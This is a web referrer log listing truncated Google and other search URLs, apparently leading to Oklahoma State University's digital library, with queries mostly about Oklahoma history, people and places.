2171http://www.google.com/search?hl=en&q=+lawton+ok%2C+cavalry+basketball+team+wi...1
2172http://www.google.com/search?hl=en&q=1979+1980+ball+gowns&btnG=Google+Search1
2173http://www.google.com/search?hl=en&q=1965+car+accidents+in+eufaula+oklahoma1
2174http://www.google.com/search?hl=en&q=1970+Okmulgee+High+School+Basketball&btn...1
2175http://digitalcamguide.blogspot.com/2007/04/excellent-e-books-on-photography....1
2176http://www.google.com/search?hl=en&q=1972+ginger+rogers+receives+honorary+doc...1
2177http://www.google.com/search?hl=en&q=1957+liberty+bank+oklahoma+semi+centenni...1
2178http://www.google.com/search?hl=en&q=1958+grocery+prices+in+oklahoma&btnG=Goo...1
2179http://www.google.com/search?hl=en&q=1960s+photographs+oklahoma1
2180http://www.google.com/search?hl=en&q=1960+oklahoma+study+clubs1
2181http://www.google.com/search?hl=en&q=+did+bosin+leave+and+come+to+america1
2182http://www.google.com/search?hl=en&q=Kentucky+Daisey&um=1&ie=UTF-8&safe=on&sa...1
2183http://www.google.com/search?hl=en&q=Kingfisher+Oklahoma+summer+music+camp1
2184http://www.google.com/search?hl=en&q=Keith+Skrzypczak1
2185http://www.google.com/search?hl=en&q=Konawa%2C+Seminole%2C+Oklahoma+Burials%2...1
2186http://www.google.com/search?hl=en&q=LEGAL+DRINKING+AGE+IN+OKLAHOMA+IN+19801
2187http://www.google.com/search?hl=en&q=Joan+Frederick+Denton1
2188http://www.google.com/search?hl=en&q=John+Free+Jr.+Western+Art+Oklahoma&btnG=...1
2189http://digital.library.okstate.edu/oktoday/1960s/19651
2190http://www.google.com/search?hl=en&q=KIEFER%2COKLAHOMA+OIL+FIELD+WATER+FLOOD&...1
2191http://www.google.com/search?hl=en&q=I+have+to+go+to+the+workshop+again+this+...1
2192http://www.google.com/search?hl=en&q=Lottinvilles+Woodgrill++Easter++Brunch+E...1
2193http://www.google.com/search?hl=en&q=Lottinvilles+Woodgrill++Easter+Day+Brunc...1
2194http://www.google.com/search?hl=en&q=Lopat+Bible&btnG=Search1
2195http://www.google.com/search?hl=en&q=Lowry+Ranch+Lenapah+Oklahoma&btnG=Google...1
2196http://www.google.com/search?hl=en&q=LOOK+FOR+SIGHTS+FOR+KID+BROKE+PONIES+FOR...1
2197http://digital.library.okstate.edu/encyclopedia/entries/K/KE016.html1
2198http://www.google.com/search?hl=en&q=Lady+T+Tack+Store+%2C+Purcell%2C+OK&btnG...1
2199http://www.google.com/search?hl=en&q=LaVerne%27s+pages+Robel1
2200http://www.google.com/search?hl=en&q=Czechoslovakian+handcrafts&btnG=Google+S...1
2201http://www.google.com/search?hl=en&q=Eagle+Park+Horse+Rental%2C+Lawton%2C+OK1
2202http://www.google.com/search?hl=en&q=Eddie+Beesley&btnG=Google+Search&aq=f1
2203http://www.google.com/search?hl=en&q=E.+K.+gaylord+originAL+DONAR+cowboy+hall...1
2204http://www.google.com/search?hl=en&q=Fred+D.+Shellabarger+University+of+Oklah...1
2205http://www.google.com/search?hl=en&q=Fred+Schonwald+Collection+of+the+Western...1
2206http://www.google.com/search?hl=en&q=DIXON+PALMER&btnG=Google+Search1
2207http://www.google.com/search?hl=en&q=Del+Hollingsworth1
2208http://www.google.com/search?hl=en&q=Don+Greve++Yukon+Oklahoma&btnG=Search1
2209http://www.google.com/search?hl=en&q=Diners+in+Oklahoma&btnG=Google+Search1
2210http://www.google.com/search?hl=en&q=Home+stipulations+Enchanted+Oaks+Eufaula...1
2211http://www.google.com/search?hl=en&q=Gyros+Gymnastics+Oklahoma1
2212http://www.google.com/search?hl=en&q=Halliburton+1956&btnG=Search1
2213http://www.google.com/search?hl=en&q=George+Wilson+Ponca+City+OK+Grand+Prix1
2214http://www.google.com/search?hl=en&q=Haymaker+Dale+Robertson+Yukon&btnG=Searc...1
2215http://www.google.com/search?hl=en&q=Ft.+Sill+Oklahoma+June+1968-+creature1
2216http://www.google.com/search?hl=en&q=Ft.+Worth+Tiah+Piah+Society&btnG=Search1
2217http://www.google.com/search?hl=en&q=George+Miksch+Sutton+paintings+scissorta...1
2218http://www.google.com/search?hl=en&q=Gary+Lantz&btnG=Search1
2219http://www.google.com/search?hl=en&q=March+1968+heavy+snow+in+Tulsa%2C+OK1
2220http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Oklahoma+4-H+Club+Congress...1
2221http://www.google.com/search?hl=en&ie=ISO-8859-1&q=clinton%2Cok+hotel+where+e...1
2222http://www.google.com/search?hl=en&ie=ISO-8859-1&q=ONLINE+ARCHIVE+OF+OKLAHOMA...1
2223http://www.google.com/search?hl=en&ie=ISO-8859-1&q=james+scheschuk1
2224http://www.google.com/search?hl=en&ie=ISO-8859-1&q=leo%27s+bar-b-que+and+webs...1
2225http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Clarence+Leblanc+Okmulgee+...1
2226http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Henegar+family+in+Lawton%2...1
2227http://www.google.com/search?hl=en&ie=ISO-8859-1&q=MOUNT+SCOTT+DRIVE-IN+THEAT...1
2228http://images.google.com/imgres?imgurl=http://digital.library.okstate.edu/okt...1
2229http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Charles+Banks+Wilson+winte...1
2230http://www.google.com/search?hl=en&lr=&as_qdr=all&q=%22pontotoc+stone%221
2231http://www.google.com/search?hl=en&lr=&as_qdr=all&q=arbuckle+arbuckles+romant...1
2232http://www.google.com/search?hl=en&ie=UTF-8&sa=X&oi=spell&resnum=0&ct=result&...1
2233http://www.google.com/search?hl=en&lr=&as_qdr=all&sa=X&oi=spell&resnum=0&ct=r...1
2234http://www.google.com/search?hl=en&ie=ISO-8859-1&q=national+cowboy+hall+of+fa...1
2235http://www.google.com/search?hl=en&ie=ISO-8859-1&q=tamara+tournanova&btnG=Sea...1
2236http://www.google.com/search?hl=en&ie=UTF-8&sa=X&oi=spell&resnum=0&ct=result&...1
2237http://www.google.com/search?hl=en&ie=UTF-8&sa=X&oi=spell&resnum=0&ct=result&...1
2238http://www.google.com/search?hl=en&lr=lang_en%7Clang_de&rlz=1T4SUNA_en___DE25...1
2239http://www.google.com/search?hl=en&client=safari&rls=en&q=does+thomas+erak+ha...1
2240http://www.google.com/search?hl=en&client=safari&rls=en&q=oklahoma+baptist+un...1
2241http://www.google.com/search?hl=en&client=safari&rls=en&q=dierks+mill+cancer&...1
2242http://www.google.com/search?hl=en&client=safari&rls=en&q=oklahoma+diners&btn...1
2243http://www.google.com/search?hl=en&client=safari&rls=en&sa=X&oi=spell&resnum=...1
2244http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla:en-US:off...1
2245http://www.google.com/search?hl=en&client=netscape-pp&rls=com.netscape%3Aen-U...1
2246http://www.google.com/search?hl=en&client=safari&rls=en&q=Oklahoma+bicentenni...1
2247http://www.google.com/search?hl=en&client=safari&q=Fort+sill+Ico+hall&btnG=Se...1
2248http://www.google.com/search?hl=en&ie=ISO-8859-1&q=1975+Oklahoma+State+4-H+Co...1
2249http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22John+bostwick%22+wrestl...1
2250http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Suzette+Brewer%221
2251http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Camp+Fire+Girl%22+and+L...1
2252http://images.google.com/imgres?imgurl=http://digital.library.okstate.edu/okt...1
2253http://www.google.com/search?hl=en&client=safari&rls=en&sa=X&oi=spell&resnum=...1
2254http://www.google.com/search?hl=en&client=safari&rls=en-us&q=Herbert+C.+Swim+...1
2255http://www.google.com/search?hl=en&client=safari&rls=en-us&sa=X&oi=spell&resn...1
2256http://www.google.com/search?hl=en&client=safari&rls=en-us&q=listen+to+free+b...1
2257http://www.google.com/search?hl=en&q=%2B1912+%2Brosedale+%2Bfire+%2Boklahoma1
2258http://www.google.com/search?hl=en&q=%22michael+maule%22+oklahoma&btnG=Search...1
2259http://www.google.com/search?hl=en&q=%22mr.+spotted+bull%22+stud+fee&btnG=Sea...1
2260http://www.google.com/search?hl=en&q=%22mary+ann+luther%221
2261http://www.google.com/search?hl=en&q=%22nature+gallery%22+william+perry1
2262http://www.google.com/search?hl=en&q=%22no+name+ranch%22+and+oklahoman1
2263http://www.google.com/search?hl=en&q=%22harming+a+hare%221
2264http://www.google.com/search?hl=en&q=%22here+we+rest%22+oklahoma1
2265http://www.google.com/search?hl=en&q=%22jo+mora%22+1932+olympics&btnG=Google+...1
2266http://www.google.com/search?hl=en&q=%22jeanne+m.+devlin%22&btnG=Search1
2267http://www.google.com/search?hl=en&q=%22gold+in+oklahoma%22&btnG=Google+Searc...1
2268http://www.google.com/search?hl=en&q=%22susan+powell%22%2C+native+american%2C...1
2269http://www.google.com/search?hl=en&q=%22susie+peters%22+and+anadarko1
2270http://www.google.com/search?hl=en&q=%22sequoyah+weavers%221
2271http://www.google.com/search?hl=en&q=%27c+b+goddard%27+ardmore+oklahoma&aq=f1
2272http://www.google.com/search?hl=en&q=%22ok+arts%22+and+prop+maker+assistant1
2273http://www.google.com/search?hl=en&q=%22oklahoma+rising+sun%22+contest1
2274http://www.google.com/search?hl=en&q=%22roman+jasinski%221
2275http://embarqmail.com/google/index.php?start=10&q=oaklahoma%20wister%20flagst...1
2276http://images.google.com.pr/imgres?imgurl=http://digital.library.okstate.edu/...1
2277http://www.google.com/search?hl=en&q=%22Clement+Vann+Rogers%22+%22Mary+Schrim...1
2278http://www.google.com/search?hl=en&q=%22Ed+Malzahn%22+birthday1
2279http://www.google.com/search?hl=en&q=%22Cheese+and+Sausage+Festival%22++Still...1
2280http://www.google.com/search?hl=en&q=%22F.+C.+Hall%22+Chickasha1
2281http://www.google.com/search?hl=en&q=%22Frontiers+of+Science+Committee%221
2282http://g.s.scandoo.com/7BB3AEA600532F2111B23633D64921EE.cache.html?01
2283http://www.google.com/search?hl=en&q=%22Bob+Brumley%22+%2B+%22Air+Force%22&bt...1
2284http://www.google.com/search?hl=en&q=%22Battle+Of+Whiskey+Hill%221
2285http://www.google.com/search?hl=en&q=%22gene+a.+stanley%22&btnG=Google+Search...1
2286http://www.google.com/search?hl=en&q=%22boat+stone%22+arkansas1
2287http://www.google.com/search?hl=en&q=%22bob+cox%22++los+alamos+coach&btnG=Sea...1
2288http://www.google.com/search?hl=en&q=%22blucher+boots%22+tom+mix&btnG=Search1
2289http://www.google.com/search?hl=en&q=%22dark+of+the+moon%22+oklahoma+theater+...1
2290http://www.google.com/search?hl=en&q=%22Harlem+Magicians%22+%2B+%22willie+mur...1
2291http://www.google.com/search?hl=en&q=%22Lincoln+park+amphitheater%221
2292http://www.google.com/search?hl=en&q=%22Until+We+Meet+Again%22+by+Michael+Kor...1
2293http://www.google.com/search?hl=en&q=%22OCC+Basketball%22&btnG=Google+Search1
2294http://images.google.com/imgres?imgurl=http://digital.library.okstate.edu/okt...1
2295http://www.google.com/search?hl=en&q=deana+ryder+oklahoma&btnG=Search1
2296http://www.google.com/search?hl=en&q=debra+bright+oklahoma+137th+air+national...1
2297http://www.google.com/search?hl=en&q=cushing+oklahoma+baseball+sight&btnG=Sea...1
2298http://busca.igbusca.com.br/app/busca.ig?o=BARRAIG&start=p&t=4&q=mennon+buggy...1
2299http://www.google.com/search?hl=en&q=denison+dam+economic+benefit1
2300http://www.google.com/search?hl=en&q=colima%2C+mexico+%22angel+lara%221
2301http://www.google.com/search?hl=en&q=colt+oklahoma+diamond+jubilee+1965&btnG=...1
2302http://www.google.com/search?hl=en&q=creature+ft+sill+oklahoma+june+19681
2303http://www.google.com/search?hl=en&q=cowtown+foxes.com&btnG=Search1
2304http://www.google.com/search?hl=en&q=chow+downs+oklahoma1
2305http://www.google.com/search?hl=en&q=did+the+first+settlers+see+the+cimarron+...1
2306http://www.google.com/search?hl=en&q=digital.library.okstate+AAA1
2307http://www.google.com/search?hl=en&q=dick+west+artist++oklahoma&btnG=Search1
2308http://www.google.com/search?hl=en&q=diners+oklahoma1
2309http://www.google.com/search?hl=en&q=design+plans+to+build+an+old+style+weste...1
2310http://www.google.com/search?hl=en&q=devil+mcry+photo1
2311http://www.google.com/search?hl=en&q=devils+canyon+relic+finds+oklahoma1
2312http://www.google.com/search?hl=en&q=devils+canyon+oklahoma+hiking1
2313http://bibpurl.oclc.org/web/206251
2314http://www.google.com/search?hl=en&q=brummet+echohawk+pic1
2315http://www.google.com/search?hl=en&q=brummet+echohawk+western+horseman1
2316http://www.google.com/search?hl=en&q=brick+chandler+o.+t.1
2317http://www.google.com/search?hl=en&q=building+3624+Fort+Sill%2C+OK%2C+United+...1
2318http://www.google.com/search?hl=en&q=cabins+in+fortgibson+lake&btnG=Google+Se...1
2319http://www.google.com/search?hl=en&q=brad+hearne+cabins+at+broken+bow+lake&bt...1
2320http://www.google.com/search?hl=en&q=brahma+bulls%2C+ranches%2C+oklahoma%2C+p...1
2321http://www.google.com/search?hl=en&q=brenda+kennedy+grummer&btnG=Google+Searc...1
2322http://centralkansas.cox.net/cci/google1
2323http://www.google.com/search?hl=en&q=chilocco+OK%2C+haunted&btnG=Search1
2324http://www.google.com/search?hl=en&q=cherokee+stockade+replica&btnG=Google+Se...1
2325http://www.google.com/search?hl=en&q=cherry+street+bakery+morning+buns+tulsa+...1
2326http://www.google.com/search?hl=en&q=charles+banks+wilson+AND+%22will+rogers%...1
2327http://www.google.com/search?hl=en&q=chickasaw+warrior+haney+1981&btnG=Search...1
2328http://www.google.com/search?hl=en&q=cal+g+kelly+and+miller+circus1
2329http://www.google.com/search?hl=en&q=catch+em+alive+jack+abernathy1
2330http://www.google.com/search?hl=en&q=cefe%3B+50th+street+%26+broadway&btnG=Go...1
2331http://www.google.com/search?hl=en&q=catholic+church+in+topolobampo+mexico&bt...1
2332http://www.google.com/search?hl=en&q=boer+goat+auctions+caddo+oklahoma1
2333http://www.google.com/search?hl=en&q=foster+estes+votech+del+city+oklahoma1
2334http://www.google.com/search?hl=en&q=frank+butram+oklahoma1
2335http://www.google.com/search?hl=en&q=florentne+statuary1
2336http://www.google.com/search?hl=en&q=frank+oma+pottery1
2337http://www.google.com/search?hl=en&q=fry+bread+mix+anadarko&btnG=Search1
2338http://www.google.com/search?hl=en&q=find+a++flee+market+with+booths+for+rent...1
2339http://www.google.com/search?hl=en&q=fire+protection+gears+tht+will+help+in+f...1
2340http://www.google.com/search?hl=en&q=flag+of+stanhope+watte&btnG=Google+Searc...1
2341http://www.google.com/search?hl=en&q=first+assembly+of+god+chickaska+oklahoma...1
2342http://www.google.com/search?hl=en&q=fairview+oklahoma+cafes+restaurants1
2343http://www.google.com/search?hl=en&q=gilbert+d+helland+altus%2C+oklahoma&btnG...1
2344http://www.google.com/search?hl=en&q=guthrie+%2B+89ers1
2345http://www.google.com/search?hl=en&q=ghost+hollow+ripley+oklahoma1
2346http://www.google.com/search?hl=en&q=ha-pah-shu-tse+restaurant1
2347http://www.google.com/search?hl=en&q=ft.+sill+nrws&btnG=Google+Search1
2348http://www.google.com/search?hl=en&q=fun+2+fast+2+furlous+games1
2349http://www.google.com/search?hl=en&q=german+festivals+of+okarche+oklahoma1
2350http://www.google.com/search?hl=en&q=g.+del+hollingsworth1
2351http://as.starware.com/dp/search?qry=AITHEA+GIBSON&src_id=322&client_id=FC1F4...1
2352http://www.google.com/search?hl=en&q=dwight+durante+and+the+globetrotters&btn...1
2353http://www.google.com/search?hl=en&q=eagle+picher+horizon+david+nutt1
2354http://www.google.com/search?hl=en&q=dwain+bland&btnG=Google+Search1
2355http://www.google.com/search?hl=en&q=eagles+%2B+Oklahoma+Today+Magazine1
2356http://www.google.com/search?hl=en&q=early+oolagah+dam+pictures1
2357http://www.google.com/search?hl=en&q=dogwood+tree+blooms+bartlesville1
2358http://www.google.com/search?hl=en&q=doris+antun&btnG=Google+Search1
2359http://www.google.com/search?hl=en&q=drill+pipe+aligator+grab&btnG=Search1
2360http://www.google.com/search?hl=en&q=downtown+shawnee,+oklahoma+pharmacy+1900...1
2361http://www.google.com/search?hl=en&q=exact+setting+of+the+book+called+Komantc...1
2362http://www.google.com/search?hl=en&q=elephant+buried+on+the+East+Central+Camp...1
2363http://www.google.com/search?hl=en&q=eufala+dam+canada+river+power1
2364http://www.google.com/search?hl=en&q=eating+crow+poison1
2365http://www.google.com/search?hl=en&q=evelyn+boake1
2366http://www.google.com/search?hl=en&q=early+oologah+dam+photos1
2367http://www.google.com/search?hl=en&q=early+plains+indian+turkey+beard+hair+ro...1
2368http://www.google.com/search?hl=en&q=easter+sunrise+service+altus+oklahoma1
2369http://www.google.com/search?hl=en&q=early+plains+indian+turkey+beard+hair+ro...1
2370http://www.google.com/search?hl=en&q=Maria++Tallchiefs+third+husband&btnG=Sea...1
2371http://www.google.com/search?hl=en&q=Ralph+Marsh1
2372http://www.google.com/search?hl=en&q=Ray+Hendley&btnG=Google+Search1
2373http://www.google.com/search?hl=en&q=REX+DUNN1
2374http://www.google.com/search?hl=en&q=Rex+dunn+bullfighting1
2375http://www.google.com/search?hl=en&q=River%27s+Bend+Resort%2C+Oklahoma+Today1
2376http://www.google.com/search?hl=en&q=Pendleton+Woods&btnG=Google+Search1
2377http://www.google.com/search?hl=en&q=Pilot+Club+Spring+Arts+and+Crafts+show+M...1
2378http://www.google.com/search?hl=en&q=Prairie+Dance+Theatre+%2B+the+daily+okla...1
2379http://www.google.com/search?hl=en&q=Pittsburgh+Plate+Glass+Company+works+10+...1
2380http://www.google.com/search?hl=en&q=Oklahoma+woodcarvers+and+baseball+bats1
2381http://www.google.com/search?hl=en&q=Shirley+Albrecht&btnG=Google+Search1
2382http://www.google.com/search?hl=en&q=Spavinaw+Hills%2C+Grand+River%2C+Oklahom...1
2383http://www.google.com/search?hl=en&q=Shara+Lea+Short%2C+Coffeyville%2C+KS&btn...1
2384http://www.google.com/search?hl=en&q=Stigler+Oklahoma+8th+grade+course+2+scie...1
2385http://destiny1/common/welcome.jsp;jsessionid=824D8A5E94D7B48B8176C91AE5E6697...1
2386http://www.google.com/search?hl=en&q=Roman+Jasinski&gbv=2&ie=UTF-8&sa=N&tab=i...1
2387http://www.google.com/search?hl=en&q=Shangri-La+Resort+Oklahoma+History+1982&...1
2388http://destiny1/common/welcome.jsp;jsessionid=48D8BB443C78C57FACDA1624A548EB9...1
2389http://www.google.com/search?hl=en&q=Today+in+1962&btnG=Search1
2390http://www.google.com/search?hl=en&q=OCI+IN+BOLEY+OKLAHOMA1
2391http://www.google.com/search?hl=en&q=OD+dunks+chickasha+game1
2392http://www.google.com/search?hl=en&q=Noble+County%2C+OK+%2B+tourism+%2B+Utes1
2393http://www.google.com/search?hl=en&q=OKLAHOMA+DINERS1
2394http://www.google.com/search?hl=en&q=OKLAHOMA+POST+OFFICE+SHOOTING+IN+19781
2395http://digital.library.okstate.edu/encyclopedia/entries/B/BU006.html1
2396http://www.google.com/search?hl=en&q=Movie+%2B+%22typhoid+fever%22+%2B+1950s+...1
2397http://www.google.com/search?hl=en&q=Neys%2C+Angler%2C+and+Red+Rock.+PRISONER...1
2398http://www.google.com/search?hl=en&q=Mrs.+Louise+Funk+Fluke1
2399http://www.google.com/search?hl=en&q=Oklahoma+weather+temperature+1958&btnG=G...1
2400http://www.google.com/search?hl=en&q=Oklahoma+State+Magazine1
2401http://www.google.com/search?hl=en&q=Oklahoma+State+University%2C+1957-58+bas...1
2402http://www.google.com/search?hl=en&q=Oklahoma+State+Law+1967&btnG=Google+Sear...1
2403http://www.google.com/search?hl=en&q=Oklahoma+entertainment+magazine1
2404http://www.google.com/search?hl=en&q=Oklahoma+1959&btnG=Google+Search1
2405http://www.google.com/search?hl=en&q=Oklahoma+Farm+Bureau+%22This+Is+Oklahoma...1
2406http://www.google.com/search?hl=en&q=Oklahoma+October+6%2C+19881
2407http://www.google.com/search?hl=en&q=Oklahoma+Junior+Miss+Pageant+in+Bartlesv...1
2408http://www.google.com/search?hl=en&q=bobby+Tabor&btnG=Google+Search1
2409http://www.google.com/search?hl=en&q=back+to+trailen+menu++game+for+you1
2410http://www.google.com/search?hl=en&q=bacone+1956&btnG=Search1
2411http://www.google.com/search?hl=en&q=azelea+pagent+muskogee+ok+entry+form1
2412http://www.google.com/search?hl=en&q=bee+creek+beavers+bend&as_q=hiking&btnG=...1
2413http://destiny1/common/servlet/presenthometreeform.do?restoreFromCrumb=1&tm=H...1
2414http://www.google.com/search?hl=en&q=antique+stores+open+on+Sunday+in+Oklahom...1
2415http://www.google.com/search?hl=en&q=apache%2Bwell%2Bblowout%2Bwheeler%2Btexa...1
2416http://www.google.com/search?hl=en&q=artist*+goddard&btnG=Google+Search1
2417http://www.google.com/search?hl=en&q=april+wacoche1
2418http://www.google.com/search?hl=en&q=antique+engines+fairview+oklahoma+dallas...1
2419http://www.google.com/search?hl=en&q=blue+ribbon+downs+racetrack+bugs+alive+i...1
2420http://www.google.com/search?hl=en&q=bob+bledsoe%2C+tulsa1
2421http://www.google.com/search?hl=en&q=blucher+boots+tom+mix&btnG=Search1
2422http://www.google.com/search?hl=en&q=bob+swaffar+basketball+player&btnG=Googl...1
2423http://www.google.com/search?hl=en&q=ben+humphrey+pediatrics+oklahoma&btnG=Go...1
2424http://www.google.com/search?hl=en&q=bennigans+in+guymon+ok&btnG=Google+Searc...1
2425http://cinematreasures.org/theater/2016/1
2426http://www.google.com/search?hl=en&q=bert+d+seabourn+posters+%28vintage%29&bt...1
2427http://www.google.com/search?hl=en&q=Until+we+meet+again+by+Michael+Korenblit...1
2428http://www.google.com/search?hl=en&q=What+kind+of+MUSIC+was+popular+in+Oklaho...1
2429http://www.google.com/search?hl=en&q=Wildcat+Oil+Company+Oklahoma+Priestley&b...1
2430http://www.google.com/search?hl=en&q=What+did+Dr.+Samuel+C.+Hurst+invent+in+1...1
2431http://www.google.com/search?hl=en&q=Wildcat+Oil+Oklahoma+Priestley&btnG=Sear...1
2432http://www.google.com/search?hl=en&q=a+famous+soccer+player+from+oklahoma+tha...1
2433http://www.google.com/search?hl=en&q=Victorian+era+furnishing+Museum+home+of+...1
2434http://www.google.com/search?hl=en&q=Wes+Benson+rodeo+rider+Oklahoma&btnG=Goo...1
2435http://www.google.com/search?hl=en&q=We+have+one+in+Oklahoma...+it%27s+called...1
2436http://www.google.com/search?hl=en&q=anne+tacker+artist&btnG=Google+Search1
2437http://www.google.com/search?hl=en&q=alph+stanphill&btnG=Search1
2438http://destiny1/common/welcome.jsp;jsessionid=0297894DD52B1E78ECC545039394A21...1
2439http://www.google.com/search?hl=en&q=alluwe+oil+field1
2440http://www.google.com/search?hl=en&q=american+indian+painters+brummett+echoha...1
2441http://www.google.com/search?hl=en&q=a+tribe+wtth+a+black+red+green+flag1
2442http://www.google.com/search?hl=en&q=access+to+devils+canyon+kiowa+oklahoma+&...1
2443http://www.google.com/search?hl=en&q=aircraft+crashes+oklahoma+19651
2444http://www.google.com/search?hl=en&q=adoption+agency+in+oklahoma+1962&btnG=Go...1
2445http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2446http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2447http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2448http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2449http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2450http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2451http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2452http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2453http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2454http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2455http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2456http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2457http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2458http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2459http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2460http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2461http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2462http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2463http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2464http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2465http://www.google.com.uy/search?hl=es&q=lawton%2C+oclahoma&btnG=Buscar+con+Go...1
2466http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2467http://www.google.com.tr/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enTR2...1
2468http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2469http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2470http://www.google.com.tr/search?hl=tr&q=watchers+wep+club+house.com&btnG=Goog...1
2471http://www.google.com.tr/search?hl=tr&sa=X&oi=spell&resnum=0&ct=result&cd=1&q...1
2472http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2473http://www.google.com.tr/search?q=england+air+defense+missile+capabilities+fi...1
2474http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2475http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2476http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2477http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2478http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2479http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2480http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2481http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2482http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2483http://www.google.com.tr/search?hl=tr&q=present+perfeet+tense&btnG=Google%27d...1
2484http://www.google.com/custom?hl=en&client=pub-8993703457585266&channel=547413...1
2485http://www.google.com/custom?hl=en&cof=&q=NEO+miami+oklahoma+aggie+day+contes...1
2486http://www.google.com/custom?hl=en&client=pub-6748655230618628&cof=FORID%3A1%...1
2487http://www.google.com/custom?hl=en&cof=&q=TOM+KNIFE+CHIEF+PAWNEE1
2488http://www.google.com/custom?hl=en&forid=1&channel=5337115873&lr=&ie=ISO-8859...1
2489http://www.google.com/custom?hl=en&client=pub-0625071953571468&channel=157414...1
2490http://www.google.com/custom?hl=en&client=pub-1415334591037307&cof=FORID:1%3B...1
2491http://www.google.com/custom?hl=en&client=pub-3016415559598565&cof=FORID%3A1%...1
2492http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2493http://www.google.com/custom?hl=en&client=pub-0625071953571468&channel=157414...1
2494http://www.google.com/custom?q=does+claremore+oklahoma+have+a+yearly+pow+wow&...1
2495http://www.google.com/custom?q=fishing+animation+of+Keta+&sa=Search&client=pu...1
2496http://www.google.com/custom?q=Petrified+tree+at+East+Central+State+Universit...1
2497http://www.google.com/custom?q=frank+ketch+oklahoma&hl=en&client=pub-02118252...1
2498http://www.google.com/custom?hl=en&safe=active&client=partner-pub-19910845778...1
2499http://www.google.com/custom?hl=it&client=pub-3847491925495723&channel=065418...1
2500http://www.google.com/custom?q=Brenda+Willis&hl=en&safe=active&client=psp-tos...1
2501http://www.google.com/custom?q=1958+blizzard+pictures&hl=en&client=pub-172595...1
2502http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2503http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2504http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2505http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2506http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2507http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2508http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2509http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2510http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2511http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
2512http://www.google.com/custom?hl=en&client=google-coop-np&cof=FORID:11%3BAH:le...1
2513http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2514http://www.google.com/custom?hl=en&client=google-coop-np&cof=FORID:11%3BAH:le...1
2515http://www.google.com/custom?hl=en&client=google-coop-np&cof=FORID:11%3BAH:le...1
2516http://www.google.com/custom?hl=en&client=google-coop-np&cof=FORID:11%3BAH:le...1
2517http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2518http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...1
